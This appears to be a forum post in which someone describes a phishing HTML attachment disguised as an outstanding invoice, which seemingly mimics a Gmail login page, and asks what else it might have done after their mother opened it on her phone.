See this link:
It was sent to my mother in an email as an html attachment last night. I have changed the file extension from .html to .txt so it shouldn't present any danger. I have no knowledge of html syntax so I dont really know what it is trying to do but it looks like when you click on it intending to open the 'OUTSTANDING INVOICE' it will instead spawn a mockup of the gmail login page to trick you into entering your gmail account credentials which presumably get forwarded on to whoever wrote the malware. She opened it originally on her Android phone so it downloaded the html file rather than opening it and anyway she doesn't have a gmail account so I would be inclined to think that no harm was done. This morning however our internet connection was down, which is very unusual, and I had to power-cycle the modem/router to get it back. This may be a coincidence but it makes me wonder if the malware did something more. She did say that when she clicked on it originally on her phone, a dialog popped up asking for access to her contacts she thinks, (not clear if it was her phone contacts or the contacts in her email account) which she granted. Now this may just have been to forward the malware on to all her (phone/email) contacts which again wouldn't concern me overly.
To see it in action you can simply rename it from .txt to .html and click on it but obviously if it does more that steal gmail credentials this would not be advised.